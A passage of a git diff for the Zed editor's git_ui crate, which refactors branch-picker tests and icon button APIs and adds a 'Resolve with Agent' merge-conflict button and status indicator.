cx| { branch_list.picker.update(cx, move |picker, _cx| { assert_eq!(picker.delegate.matches.len(), 3); @@ -1520,21 +1560,15 @@ mod tests { .iter() .map(|be| be.name()) .collect::>(); - assert_eq!( - branches, - ["main", "feature-auth", "feature-ui", "develop"] - .into_iter() - .filter(|name| name != &branch_to_delete) - .collect::>() - ); + assert_eq!(branches, expected_branches); }) }); } #[gpui::test] - async fn test_delete_remote(cx: &mut TestAppContext) { + async fn test_delete_remote_branch(cx: &mut TestAppContext) { init_test(cx); - let repository = init_fake_repository(cx).await; + let (_project, repository) = init_fake_repository(cx).await; let branches = vec![ create_test_branch("main", true, Some("origin"), Some(1000)), create_test_branch("feature-auth", false, Some("origin"), Some(900)), @@ -1542,19 +1576,17 @@ mod tests { create_test_branch("develop", false, Some("private"), Some(700)), ]; - let remote_names = branches + let branch_names = branches .iter() - .filter_map(|branch| branch.remote_name().map(|r| r.to_string())) + .map(|branch| branch.name().to_string()) .collect::>(); let repo = repository.clone(); cx.spawn(async move |mut cx| { - for branch in remote_names { - repo.update(&mut cx, |repo, _| { - repo.create_remote(branch, String::from("test")) - }) - .await - .unwrap() - .unwrap(); + for branch in branch_names { + repo.update(&mut cx, |repo, _| repo.create_branch(branch, None)) + .await + .unwrap() + .unwrap(); } }) .await; @@ -1581,6 +1613,35 @@ mod tests { }); cx.run_until_parked(); + let expected_branches = [ + "origin/main", + "origin/feature-auth", + "fork/feature-ui", + "private/develop", + ] + .into_iter() + .filter(|name| name != &branch_to_delete) + .collect::>(); + let repo_branches = branch_list + .update(cx, |branch_list, cx| { + branch_list.picker.update(cx, |picker, cx| { + picker + .delegate + .repo + .as_ref() + .unwrap() + .update(cx, |repo, _cx| repo.branches()) + }) + }) + .await + .unwrap() + .unwrap(); + let repo_branches = repo_branches + .iter() + .map(|b| b.name()) + .collect::>(); + assert_eq!(&repo_branches, &expected_branches); + // Check matches, it should match one less branch than before branch_list.update(cx, move |branch_list, cx| { branch_list.picker.update(cx, move |picker, _cx| { @@ -1591,18 +1652,7 @@ mod tests { .iter() .map(|be| be.name()) .collect::>(); - assert_eq!( - branches, - [ - "origin/main", - "origin/feature-auth", - "fork/feature-ui", - "private/develop" - ] - .into_iter() - .filter(|name| name != &branch_to_delete) - .collect::>() - ); + assert_eq!(branches, expected_branches); }) }); } @@ -1721,7 +1771,7 @@ mod tests { const NEW_BRANCH: &str = "new-feature-branch"; init_test(test_cx); - let repository = init_fake_repository(test_cx).await; + let (_project, repository) = init_fake_repository(test_cx).await; let branches = vec![ create_test_branch(MAIN_BRANCH, true, None, Some(1000)), @@ -1785,7 +1835,7 @@ mod tests { #[gpui::test] async fn test_remote_url_detection_https(cx: &mut TestAppContext) { init_test(cx); - let repository = init_fake_repository(cx).await; + let (_project, repository) = init_fake_repository(cx).await; let branches = vec![create_test_branch("main", true, None, Some(1000))]; let (branch_list, mut ctx) = init_branch_list_test(repository.into(), branches, cx).await; diff --git a/crates/git_ui/src/commit_modal.rs b/crates/git_ui/src/commit_modal.rs index 57c25681439f9bb8ea7e5761c01d4c1a9defd427..2088ad77ec5d7e71bdfb42ebcbfab6d001f64375 100644 --- a/crates/git_ui/src/commit_modal.rs +++ b/crates/git_ui/src/commit_modal.rs @@ -366,11 +366,12 @@ impl CommitModal { .unwrap_or_else(|| "".to_owned()); let branch_picker_button = panel_button(branch) - .icon(IconName::GitBranch) - .icon_size(IconSize::Small) - .icon_color(Color::Placeholder) + .start_icon( + Icon::new(IconName::GitBranch) + .size(IconSize::Small) + .color(Color::Placeholder), + ) .color(Color::Muted) - .icon_position(IconPosition::Start) .on_click(cx.listener(|_, _, window, cx| { window.dispatch_action(zed_actions::git::Branch.boxed_clone(), cx); })) @@ -452,6 +453,7 @@ impl CommitModal { CommitOptions { amend: is_amend_pending, signoff: is_signoff_enabled, + allow_empty: false, }, window, cx, diff --git a/crates/git_ui/src/commit_tooltip.rs b/crates/git_ui/src/commit_tooltip.rs index 21e7d8a5d1f8e3f5c5b124fe8b276028df91b752..b22fcee7e2de5273983b6959f8c52511b877eeaf 100644 --- a/crates/git_ui/src/commit_tooltip.rs +++ b/crates/git_ui/src/commit_tooltip.rs @@ -12,7 +12,7 @@ use markdown::{Markdown, MarkdownElement}; use project::git_store::Repository; use settings::Settings; use std::hash::Hash; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use time::{OffsetDateTime, UtcOffset}; use ui::{Avatar, CopyButton, Divider, prelude::*, tooltip_container}; use workspace::Workspace; @@ -336,9 +336,10 @@ impl Render for CommitTooltip { format!("#{}", pr.number), ) .color(Color::Muted) - .icon(IconName::PullRequest) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::PullRequest) + .color(Color::Muted), + ) .style(ButtonStyle::Subtle) .on_click(move |_, _, cx| { cx.stop_propagation(); @@ -354,9 +355,9 @@ impl Render for CommitTooltip { ) .style(ButtonStyle::Subtle) .color(Color::Muted) - .icon(IconName::FileGit) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::FileGit).color(Color::Muted), + ) .on_click( move |_, window, cx| { CommitView::open( diff --git a/crates/git_ui/src/commit_view.rs b/crates/git_ui/src/commit_view.rs index 8f2a019fddf0513c100a53956c81012d11c2ca30..aac44c7f9c6eaf6f18c72bea390c0a0b7ad1a4bd 100644 --- a/crates/git_ui/src/commit_view.rs +++ b/crates/git_ui/src/commit_view.rs @@ -3,7 +3,6 @@ use buffer_diff::BufferDiff; use collections::HashMap; use editor::display_map::{BlockPlacement, BlockProperties, BlockStyle}; use editor::{Addon, Editor, EditorEvent, ExcerptRange, MultiBuffer, multibuffer_context_lines}; -use feature_flags::{FeatureFlagAppExt as _, GitGraphFeatureFlag}; use git::repository::{CommitDetails, CommitDiff, RepoPath, is_binary_content}; use git::status::{FileStatus, StatusCode, TrackedStatus}; use git::{ @@ -212,7 +211,7 @@ impl CommitView { editor.insert_blocks( [BlockProperties { - placement: BlockPlacement::Above(editor::Anchor::min()), + placement: BlockPlacement::Above(editor::Anchor::Min), height: Some(1), style: BlockStyle::Sticky, render: Arc::new(|_| gpui::Empty.into_any_element()), @@ -223,7 +222,10 @@ impl CommitView { editor .buffer() .read(cx) - .buffer_anchor_to_anchor(&message_buffer, Anchor::MAX, cx) + .snapshot(cx) + .anchor_in_buffer(Anchor::max_for_buffer( + message_buffer.read(cx).remote_id(), + )) .map(|anchor| BlockProperties { placement: BlockPlacement::Below(anchor), height: Some(1), @@ -414,38 +416,7 @@ impl CommitView { } fn calculate_changed_lines(&self, cx: &App) -> (u32, u32) { - let snapshot = self.multibuffer.read(cx).snapshot(cx); - let mut total_additions = 0u32; - let mut total_deletions = 0u32; - - let mut seen_buffers = std::collections::HashSet::new(); - for (_, buffer, _) in snapshot.excerpts() { - let buffer_id = buffer.remote_id(); - if !seen_buffers.insert(buffer_id) { - continue; - } - - let Some(diff) = snapshot.diff_for_buffer_id(buffer_id) else { - continue; - }; - - let base_text = diff.base_text(); - - for hunk in diff.hunks_intersecting_range(Anchor::MIN..Anchor::MAX, buffer) { - let added_rows = hunk.range.end.row.saturating_sub(hunk.range.start.row); - total_additions += added_rows; - - let base_start = base_text - .offset_to_point(hunk.diff_base_byte_range.start) - .row; - let base_end = base_text.offset_to_point(hunk.diff_base_byte_range.end).row; - let deleted_rows = base_end.saturating_sub(base_start); - - total_deletions += deleted_rows; - } - } - - (total_additions, total_deletions) + self.multibuffer.read(cx).snapshot(cx).total_changed_lines() } fn render_header(&self, window: &mut Window, cx: &mut Context) -> impl IntoElement { @@ -524,10 +495,11 @@ impl CommitView { .when(self.stash.is_none(), |this| { this.child( Button::new("sha", "Commit SHA") - .icon(copy_icon) - .icon_color(copy_icon_color) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon( + Icon::new(copy_icon) + .size(IconSize::Small) + .color(copy_icon_color), + ) .tooltip({ let commit_sha = commit_sha.clone(); move |_, cx| { @@ -1072,21 +1044,19 @@ impl Render for CommitViewToolbar { }), ) .when(!is_stash, |this| { - this.when(cx.has_flag::(), |this| { - this.child( - IconButton::new("show-in-git-graph", IconName::GitGraph) - .icon_size(IconSize::Small) - .tooltip(Tooltip::text("Show in Git Graph")) - .on_click(move |_, window, cx| { - window.dispatch_action( - Box::new(crate::git_panel::OpenAtCommit { - sha: sha_for_graph.clone(), - }), - cx, - ); - }), - ) - }) + this.child( + IconButton::new("show-in-git-graph", IconName::GitGraph) + .icon_size(IconSize::Small) + .tooltip(Tooltip::text("Show in Git Graph")) + .on_click(move |_, window, cx| { + window.dispatch_action( + Box::new(crate::git_panel::OpenAtCommit { + sha: sha_for_graph.clone(), + }), + cx, + ); + }), + ) .children(remote_info.map(|(provider_name, url)| { let icon = match provider_name.as_str() { "GitHub" => IconName::Github, diff --git a/crates/git_ui/src/conflict_view.rs b/crates/git_ui/src/conflict_view.rs index 82571b541e692141f843a4c3ef6e082c72e55e48..25175dce48163778615c26a585cd8a6319c1735f 100644 --- a/crates/git_ui/src/conflict_view.rs +++ b/crates/git_ui/src/conflict_view.rs @@ -1,18 +1,27 @@ +use agent_settings::AgentSettings; use collections::{HashMap, HashSet}; use editor::{ ConflictsOurs, ConflictsOursMarker, ConflictsOuter, ConflictsTheirs, ConflictsTheirsMarker, - Editor, EditorEvent, ExcerptId, MultiBuffer, RowHighlightOptions, + Editor, EditorEvent, MultiBuffer, RowHighlightOptions, display_map::{BlockContext, BlockPlacement, BlockProperties, BlockStyle, CustomBlockId}, }; use gpui::{ - App, Context, Entity, InteractiveElement as _, ParentElement as _, Subscription, Task, - WeakEntity, + App, ClickEvent, Context, Empty, Entity, InteractiveElement as _, ParentElement as _, + Subscription, Task, WeakEntity, }; use language::{Anchor, Buffer, BufferId}; -use project::{ConflictRegion, ConflictSet, ConflictSetUpdate, ProjectItem as _}; +use project::{ + ConflictRegion, ConflictSet, ConflictSetUpdate, Project, ProjectItem as _, + git_store::{GitStore, GitStoreEvent, RepositoryEvent}, +}; +use settings::Settings; use std::{ops::Range, sync::Arc}; -use ui::{ActiveTheme, Element as _, Styled, Window, prelude::*}; +use ui::{ButtonLike, Divider, Tooltip, prelude::*}; use util::{ResultExt as _, debug_panic, maybe}; +use workspace::{StatusItemView, Workspace, item::ItemHandle}; +use zed_actions::agent::{ + ConflictContent, ResolveConflictedFilesWithAgent, ResolveConflictsWithAgent, +}; pub(crate) struct ConflictAddon { buffers: HashMap, @@ -58,62 +67,22 @@ pub fn register_editor(editor: &mut Editor, buffer: Entity, cx: &mu let buffers = buffer.read(cx).all_buffers(); for buffer in buffers { - buffer_added(editor, buffer, cx); + buffer_ranges_updated(editor, buffer, cx); } cx.subscribe(&cx.entity(), |editor, _, event, cx| match event { - EditorEvent::ExcerptsAdded { buffer, .. } => buffer_added(editor, buffer.clone(), cx), - EditorEvent::ExcerptsExpanded { ids } => { - let multibuffer = editor.buffer().read(cx).snapshot(cx); - for excerpt_id in ids { - let Some(buffer) = multibuffer.buffer_for_excerpt(*excerpt_id) else { - continue; - }; - let addon = editor.addon::().unwrap(); - let Some(conflict_set) = addon.conflict_set(buffer.remote_id()).clone() else { - return; - }; - excerpt_for_buffer_updated(editor, conflict_set, cx); - } + EditorEvent::BufferRangesUpdated { buffer, .. } => { + buffer_ranges_updated(editor, buffer.clone(), cx) + } + EditorEvent::BuffersRemoved { removed_buffer_ids } => { + buffers_removed(editor, removed_buffer_ids, cx) } - EditorEvent::ExcerptsRemoved { - removed_buffer_ids, .. - } => buffers_removed(editor, removed_buffer_ids, cx), _ => {} }) .detach(); } -fn excerpt_for_buffer_updated( - editor: &mut Editor, - conflict_set: Entity, - cx: &mut Context, -) { - let conflicts_len = conflict_set.read(cx).snapshot().conflicts.len(); - let buffer_id = conflict_set.read(cx).snapshot().buffer_id; - let Some(buffer_conflicts) = editor - .addon_mut::() - .unwrap() - .buffers - .get(&buffer_id) - else { - return; - }; - let addon_conflicts_len = buffer_conflicts.block_ids.len(); - conflicts_updated( - editor, - conflict_set, - &ConflictSetUpdate { - buffer_range: None, - old_range: 0..addon_conflicts_len, - new_range: 0..conflicts_len, - }, - cx, - ); -} - -#[ztracing::instrument(skip_all)] -fn buffer_added(editor: &mut Editor, buffer: Entity, cx: &mut Context) { +fn buffer_ranges_updated(editor: &mut Editor, buffer: Entity, cx: &mut Context) { let Some(project) = editor.project() else { return; }; @@ -179,14 +148,6 @@ fn conflicts_updated( let conflict_set = conflict_set.read(cx).snapshot(); let multibuffer = editor.buffer().read(cx); let snapshot = multibuffer.snapshot(cx); - let excerpts = multibuffer.excerpts_for_buffer(buffer_id, cx); - let Some(buffer_snapshot) = excerpts - .first() - .and_then(|(excerpt_id, _)| snapshot.buffer_for_excerpt(*excerpt_id)) - else { - return; - }; - let old_range = maybe!({ let conflict_addon = editor.addon_mut::().unwrap(); let buffer_conflicts = conflict_addon.buffers.get(&buffer_id)?; @@ -221,23 +182,7 @@ fn conflicts_updated( let mut removed_highlighted_ranges = Vec::new(); let mut removed_block_ids = HashSet::default(); for (conflict_range, block_id) in old_conflicts { - let Some((excerpt_id, _)) = excerpts.iter().find(|(_, range)| { - let precedes_start = range - .context - .start - .cmp(&conflict_range.start, buffer_snapshot) - .is_le(); - let follows_end = range - .context - .end - .cmp(&conflict_range.start, buffer_snapshot) - .is_ge(); - precedes_start && follows_end - }) else { - continue; - }; - let excerpt_id = *excerpt_id; - let Some(range) = snapshot.anchor_range_in_excerpt(excerpt_id, conflict_range) else { + let Some(range) = snapshot.buffer_anchor_range_to_anchor_range(conflict_range) else { continue; }; removed_highlighted_ranges.push(range.clone()); @@ -263,26 +208,9 @@ fn conflicts_updated( let new_conflicts = &conflict_set.conflicts[event.new_range.clone()]; let mut blocks = Vec::new(); for conflict in new_conflicts { - let Some((excerpt_id, _)) = excerpts.iter().find(|(_, range)| { - let precedes_start = range - .context - .start - .cmp(&conflict.range.start, buffer_snapshot) - .is_le(); - let follows_end = range - .context - .end - .cmp(&conflict.range.start, buffer_snapshot) - .is_ge(); - precedes_start && follows_end - }) else { - continue; - }; - let excerpt_id = *excerpt_id; - - update_conflict_highlighting(editor, conflict, &snapshot, excerpt_id, cx); + update_conflict_highlighting(editor, conflict, &snapshot, cx); - let Some(anchor) = snapshot.anchor_in_excerpt(excerpt_id, conflict.range.start) else { + let Some(anchor) = snapshot.anchor_in_excerpt(conflict.range.start) else { continue; }; @@ -293,7 +221,7 @@ fn conflicts_updated( style: BlockStyle::Sticky, render: Arc::new({ let conflict = conflict.clone(); - move |cx| render_conflict_buttons(&conflict, excerpt_id, editor_handle.clone(), cx) + move |cx| render_conflict_buttons(&conflict, editor_handle.clone(), cx) }), priority: 0, }) @@ -319,14 +247,13 @@ fn update_conflict_highlighting( editor: &mut Editor, conflict: &ConflictRegion, buffer: &editor::MultiBufferSnapshot, - excerpt_id: editor::ExcerptId, cx: &mut Context, ) -> Option<()> { log::debug!("update conflict highlighting for {conflict:?}"); - let outer = buffer.anchor_range_in_excerpt(excerpt_id, conflict.range.clone())?; - let ours = buffer.anchor_range_in_excerpt(excerpt_id, conflict.ours.clone())?; - let theirs = buffer.anchor_range_in_excerpt(excerpt_id, conflict.theirs.clone())?; + let outer = buffer.buffer_anchor_range_to_anchor_range(conflict.range.clone())?; + let ours = buffer.buffer_anchor_range_to_anchor_range(conflict.ours.clone())?; + let theirs = buffer.buffer_anchor_range_to_anchor_range(conflict.theirs.clone())?; let ours_background = cx.theme().colors().version_control_conflict_marker_ours; let theirs_background = cx.theme().colors().version_control_conflict_marker_theirs; @@ -364,15 +291,15 @@ fn update_conflict_highlighting( fn render_conflict_buttons( conflict: &ConflictRegion, - excerpt_id: ExcerptId, editor: WeakEntity, cx: &mut BlockContext, ) -> AnyElement { + let is_ai_enabled = AgentSettings::get_global(cx).enabled(cx); + h_flex() .id(cx.block_id) .h(cx.line_height) .ml(cx.margins.gutter.width) - .items_end() .gap_1() .bg(cx.theme().colors().editor_background) .child( @@ -385,7 +312,6 @@ fn render_conflict_buttons( move |_, window, cx| { resolve_conflict( editor.clone(), - excerpt_id, conflict.clone(), vec![ours.clone()], window, @@ -405,7 +331,6 @@ fn render_conflict_buttons( move |_, window, cx| { resolve_conflict( editor.clone(), - excerpt_id, conflict.clone(), vec![theirs.clone()], window, @@ -419,13 +344,13 @@ fn render_conflict_buttons( Button::new("both", "Use Both") .label_size(LabelSize::Small) .on_click({ + let editor = editor.clone(); let conflict = conflict.clone(); let ours = conflict.ours.clone(); let theirs = conflict.theirs.clone(); move |_, window, cx| { resolve_conflict( editor.clone(), - excerpt_id, conflict.clone(), vec![ours.clone(), theirs.clone()], window, @@ -435,12 +360,81 @@ fn render_conflict_buttons( } }), ) + .when(is_ai_enabled, |this| { + this.child(Divider::vertical()).child( + Button::new("resolve-with-agent", "Resolve with Agent") + .label_size(LabelSize::Small) + .start_icon( + Icon::new(IconName::ZedAssistant) + .size(IconSize::Small) + .color(Color::Muted), + ) + .on_click({ + let conflict = conflict.clone(); + move |_, window, cx| { + let content = editor + .update(cx, |editor, cx| { + let multibuffer = editor.buffer().read(cx); + let buffer_id = conflict.ours.end.buffer_id; + let buffer = multibuffer.buffer(buffer_id)?; + let buffer_read = buffer.read(cx); + let snapshot = buffer_read.snapshot(); + let conflict_text = snapshot + .text_for_range(conflict.range.clone()) + .collect::(); + let file_path = buffer_read + .file() + .and_then(|file| file.as_local()) + .map(|f| f.abs_path(cx).to_string_lossy().to_string()) + .unwrap_or_default(); + Some(ConflictContent { + file_path, + conflict_text, + ours_branch_name: conflict.ours_branch_name.to_string(), + theirs_branch_name: conflict.theirs_branch_name.to_string(), + }) + }) + .ok() + .flatten(); + if let Some(content) = content { + window.dispatch_action( + Box::new(ResolveConflictsWithAgent { + conflicts: vec![content], + }), + cx, + ); + } + } + }), + ) + }) .into_any() } +fn collect_conflicted_file_paths(project: &Project, cx: &App) -> Vec { + let git_store = project.git_store().read(cx); + let mut paths = Vec::new(); + + for repo in git_store.repositories().values() { + let snapshot = repo.read(cx).snapshot(); + for (repo_path, _) in snapshot.merge.merge_heads_by_conflicted_path.iter() { + if let Some(project_path) = repo.read(cx).repo_path_to_project_path(repo_path, cx) { + paths.push( + project_path + .path + .as_std_path() + .to_string_lossy() + .to_string(), + ); + } + } + } + + paths +} + pub(crate) fn resolve_conflict( editor: WeakEntity, - excerpt_id: ExcerptId, resolved_conflict: ConflictRegion, ranges: Vec>, window: &mut Window, @@ -452,7 +446,7 @@ pub(crate) fn resolve_conflict( let workspace = editor.workspace()?; let project = editor.project()?.clone(); let multibuffer = editor.buffer().clone(); - let buffer_id = resolved_conflict.ours.end.buffer_id?; + let buffer_id = resolved_conflict.ours.end.buffer_id; let buffer = multibuffer.read(cx).buffer(buffer_id)?; resolved_conflict.resolve(buffer.clone(), &ranges, cx); let conflict_addon = editor.addon_mut::().unwrap(); @@ -471,7 +465,7 @@ pub(crate) fn resolve_conflict( .ok()?; let &(_, block_id) = &state.block_ids[ix]; let range = - snapshot.anchor_range_in_excerpt(excerpt_id, resolved_conflict.range)?; + snapshot.buffer_anchor_range_to_anchor_range(resolved_conflict.range)?; editor.remove_gutter_highlights::(vec![range.clone()], cx); @@ -511,3 +505,171 @@ pub(crate) fn resolve_conflict( } }) } + +pub struct MergeConflictIndicator { + project: Entity, + conflicted_paths: Vec, + last_shown_paths: HashSet, + dismissed: bool, + _subscription: Subscription, +} + +impl MergeConflictIndicator { + pub fn new(workspace: &Workspace, cx: &mut Context) -> Self { + let project = workspace.project().clone(); + let git_store = project.read(cx).git_store().clone(); + + let subscription = cx.subscribe(&git_store, Self::on_git_store_event); + + let conflicted_paths = collect_conflicted_file_paths(project.read(cx), cx); + let last_shown_paths: HashSet = conflicted_paths.iter().cloned().collect(); + + Self { + project, + conflicted_paths, + last_shown_paths, + dismissed: false, + _subscription: subscription, + } + } + + fn on_git_store_event( + &mut self, + _git_store: Entity, + event: &GitStoreEvent, + cx: &mut Context, + ) { + let conflicts_changed = matches!( + event, + GitStoreEvent::ConflictsUpdated + | GitStoreEvent::RepositoryUpdated(_, RepositoryEvent::StatusesChanged, _) + ); + + let agent_settings = AgentSettings::get_global(cx); + if !agent_settings.enabled(cx) + || !agent_settings.show_merge_conflict_indicator + || !conflicts_changed + { + return; + } + + let project = self.project.read(cx); + if project.is_via_collab() { + return; + } + + let paths = collect_conflicted_file_paths(project, cx); + let current_paths_set: HashSet = paths.iter().cloned().collect(); + + if paths.is_empty() { + self.conflicted_paths.clear(); + self.last_shown_paths.clear(); + self.dismissed = false; + cx.notify(); + } else if self.last_shown_paths != current_paths_set { + self.last_shown_paths = current_paths_set; + self.conflicted_paths = paths; + self.dismissed = false; + cx.notify(); + } + } + + fn resolve_with_agent(&mut self, window: &mut Window, cx: &mut Context) { + window.dispatch_action( + Box::new(ResolveConflictedFilesWithAgent { + conflicted_file_paths: self.conflicted_paths.clone(), + }), + cx, + ); + self.dismissed = true; + cx.notify(); + } + + fn dismiss(&mut self, _: &ClickEvent, _window: &mut Window, cx: &mut Context) { + self.dismissed = true; + cx.notify(); + } +} + +impl Render for MergeConflictIndicator { + fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { + let agent_settings = AgentSettings::get_global(cx); + if !agent_settings.enabled(cx) + || !agent_settings.show_merge_conflict_indicator + || self.conflicted_paths.is_empty() + || self.dismissed + { + return Empty.into_any_element(); + } + + let file_count = self.conflicted_paths.len(); + + let message: SharedString = format!( + "Resolve Merge Conflict{} with Agent", + if file_count == 1 { "" } else { "s" } + ) + .into(); + + let tooltip_label: SharedString = format!( + "Found {} {} across the codebase", + file_count, + if file_count == 1 { + "conflict" + } else { + "conflicts" + } + ) + .into(); + + let border_color = cx.theme().colors().text_accent.opacity(0.2); + + h_flex() + .h(rems_from_px(22.)) + .rounded_sm() + .border_1() + .border_color(border_color) + .child( + ButtonLike::new("update-button") + .child( + h_flex() + .h_full() + .gap_1() + .child( + Icon::new(IconName::GitMergeConflict) + .size(IconSize::Small) + .color(Color::Muted), + ) + .child(Label::new(message).size(LabelSize::Small)), + ) + .tooltip(move |_, cx| { + Tooltip::with_meta( + tooltip_label.clone(), + None, + "Click to Resolve with Agent", + cx, + ) + }) + .on_click(cx.listener(|this, _, window, cx| { + this.resolve_with_agent(window, cx); + })), + ) + .child( + div().border_l_1().border_color(border_color).child( + IconButton::new("dismiss-merge-conflicts", IconName::Close) + .icon_size(IconSize::XSmall) + .on_click(cx.listener(Self::dismiss)), + ), + ) + .into_any_element() + } +} + +impl StatusItemView for MergeConflictIndicator { + fn set_active_pane_item( + &mut self, + _: Option<&dyn ItemHandle>, + _window: &mut Window, + _: &mut Context, + ) { + } +} diff --git a/crates/git_ui/src/file_diff_view.rs b/crates/git_ui/src/file_diff_view.rs index 115a53abbc240a37b7d4800c4c7905bed270be91..6fe3d9484b4b6aca72f39ab5672e24e1430114ec 100644 --- a/crates/git_ui/src/file_diff_view.rs +++ b/crates/git_ui/src/file_diff_view.rs @@ -6,9 +6,9 @@ use editor::{Editor, EditorEvent, MultiBuffer}; use futures::{FutureExt, select_biased}; use gpui::{ AnyElement, App, AppContext as _, AsyncApp, Context, Entity, EventEmitter, FocusHandle, - Focusable, IntoElement, Render, Task, WeakEntity, Window, + Focusable, Font, IntoElement, Render, Task, WeakEntity, Window, }; -use language::{Buffer, LanguageRegistry}; +use language::{Buffer, HighlightedText, LanguageRegistry}; use project::Project; use std::{ any::{Any, TypeId}, @@ -21,7 +21,7 @@ use ui::{Color, Icon, IconName, Label, LabelCommon as _, SharedString}; use util::paths::PathExt as _; use workspace::{ Item, ItemHandle as _, ItemNavHistory, ToolbarItemLocation, Workspace, - item::{BreadcrumbText, ItemEvent, SaveOptions, TabContentParams}, + item::{ItemEvent, SaveOptions, TabContentParams}, searchable::SearchableItemHandle, }; @@ -108,7 +108,7 @@ impl FileDiffView { for buffer in [&old_buffer, &new_buffer] { cx.subscribe(buffer, move |this, _, event, _| match event { - language::BufferEvent::Edited + language::BufferEvent::Edited { .. } | language::BufferEvent::LanguageChanged(_) | language::BufferEvent::Reparsed => { this.buffer_changes_tx.send(()).ok(); @@ -324,7 +324,7 @@ impl Item for FileDiffView { ToolbarItemLocation::PrimaryLeft } - fn breadcrumbs(&self, cx: &App) -> Option> { + fn breadcrumbs(&self, cx: &App) -> Option<(Vec, Option)> { self.editor.breadcrumbs(cx) } @@ -379,7 +379,7 @@ mod tests { cx.update(|cx| { let settings_store = SettingsStore::test(cx); cx.set_global(settings_store); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); }); } diff --git a/crates/git_ui/src/file_history_view.rs b/crates/git_ui/src/file_history_view.rs index ffd600c32af5be8fe9f390b93b6f96911bfecb07..e0cee4ef1d66b7c09ff249d2323fc9fa72abbd7c 100644 --- a/crates/git_ui/src/file_history_view.rs +++ b/crates/git_ui/src/file_history_view.rs @@ -429,10 +429,11 @@ impl Render for FileHistoryView { Button::new("load-more", "Load More") .disabled(self.loading_more) .label_size(LabelSize::Small) - .icon(IconName::ArrowCircle) - .icon_size(IconSize::Small) - .icon_color(Color::Muted) - .icon_position(IconPosition::Start) + .start_icon( + Icon::new(IconName::ArrowCircle) + .size(IconSize::Small) + .color(Color::Muted), + ) .on_click(cx.listener(|this, _, window, cx| { this.load_more(window, cx); })), @@ -565,7 +566,10 @@ impl Item for FileHistoryView { false } - fn breadcrumbs(&self, _cx: &App) -> Option> { + fn breadcrumbs( + &self, + _cx: &App, + ) -> Option<(Vec, Option)> { None } diff --git a/crates/git_ui/src/git_panel.rs b/crates/git_ui/src/git_panel.rs index 31cbc34c060a5e9abd26a704ae82a57148a70df0..1d907b969f9b6288a9b72b0cdc7b5445d63268fa 100644 --- a/crates/git_ui/src/git_panel.rs +++ b/crates/git_ui/src/git_panel.rs @@ -2,6 +2,7 @@ use crate::askpass_modal::AskPassModal; use crate::commit_modal::CommitModal; use crate::commit_tooltip::CommitTooltip; use crate::commit_view::CommitView; +use crate::git_panel_settings::GitPanelScrollbarAccessor; use crate::project_diff::{self, BranchDiff, Diff, ProjectDiff}; use crate::remote_output::{self, RemoteAction, SuccessMessage}; use crate::{branch_picker, picker_prompt, render_remote_button}; @@ -12,14 +13,14 @@ use crate::{ use agent_settings::AgentSettings; use anyhow::Context as _; use askpass::AskPassDelegate; -use cloud_llm_client::CompletionIntent; use collections::{BTreeMap, HashMap, HashSet}; -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use editor::{ Direction, Editor, EditorElement, EditorMode, MultiBuffer, MultiBufferOffset, actions::ExpandAllDiffHunks, }; use editor::{EditorStyle, RewrapOptions}; +use file_icons::FileIcons; use futures::StreamExt as _; use git::commit::ParsedCommitMessage; use git::repository::{ @@ -41,21 +42,22 @@ use gpui::{ WeakEntity, actions, anchored, deferred, point, size, uniform_list, }; use itertools::Itertools; -use language::{Buffer, BufferEvent, File}; +use language::{Buffer, File}; use language_model::{ - ConfiguredModel, LanguageModelRegistry, LanguageModelRequest, LanguageModelRequestMessage, Role, + CompletionIntent, ConfiguredModel, LanguageModelRegistry, LanguageModelRequest, + LanguageModelRequestMessage, Role, }; use menu; -use multi_buffer::ExcerptInfo; +use multi_buffer::ExcerptBoundaryInfo; use notifications::status_toast::{StatusToast, ToastIcon}; use panel::{PanelHeader, panel_button, panel_filled_button, panel_icon_button}; use project::{ Fs, Project, ProjectPath, - buffer_store::BufferStoreEvent, git_store::{GitStoreEvent, Repository, RepositoryEvent, RepositoryId, pending_op}, project_settings::{GitPathStyle, ProjectSettings}, }; use prompt_store::{BuiltInPrompt, PromptId, PromptStore, RULES_FILE_NAMES}; +use proto::RpcError; use serde::{Deserialize, Serialize}; use settings::{Settings, SettingsStore, StatusStyle}; use smallvec::SmallVec; @@ -64,7 +66,7 @@ use std::ops::Range; use std::path::Path; use std::{sync::Arc, time::Duration, usize}; use strum::{IntoEnumIterator, VariantNames}; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use time::OffsetDateTime; use ui::{ ButtonLike, Checkbox, CommonAnimationExt, ContextMenu, ElevationIndex, IndentGuideColors, @@ -257,7 +259,6 @@ pub enum Event { #[derive(Serialize, Deserialize)] struct SerializedGitPanel { - width: Option, #[serde(default)] amend_pending: bool, #[serde(default)] @@ -532,6 +533,7 @@ pub struct GitStatusEntry { pub(crate) repo_path: RepoPath, pub(crate) status: FileStatus, pub(crate) staging: StageStatus, + pub(crate) diff_stat: Option, } impl GitStatusEntry { @@ -643,7 +645,6 @@ pub struct GitPanel { tracked_count: usize, tracked_staged_count: usize, update_visible_entries_task: Task<()>, - width: Option, pub(crate) workspace: WeakEntity, context_menu: Option<(Entity, Point, Subscription)>, modal_open: bool, @@ -652,8 +653,7 @@ pub struct GitPanel { local_committer_task: Option>, bulk_staging: Option, stash_entries: GitStash, - diff_stats: HashMap, - diff_stats_task: Task<()>, + _settings_subscription: Subscription, } @@ -714,33 +714,44 @@ impl GitPanel { let mut was_sort_by_path = GitPanelSettings::get_global(cx).sort_by_path; let mut was_tree_view = GitPanelSettings::get_global(cx).tree_view; + let mut was_file_icons = GitPanelSettings::get_global(cx).file_icons; + let mut was_folder_icons = GitPanelSettings::get_global(cx).folder_icons; let mut was_diff_stats = GitPanelSettings::get_global(cx).diff_stats; cx.observe_global_in::(window, move |this, window, cx| { - let sort_by_path = GitPanelSettings::get_global(cx).sort_by_path; - let tree_view = GitPanelSettings::get_global(cx).tree_view; - let diff_stats = GitPanelSettings::get_global(cx).diff_stats; + let settings = GitPanelSettings::get_global(cx); + let sort_by_path = settings.sort_by_path; + let tree_view = settings.tree_view; + let file_icons = settings.file_icons; + let folder_icons = 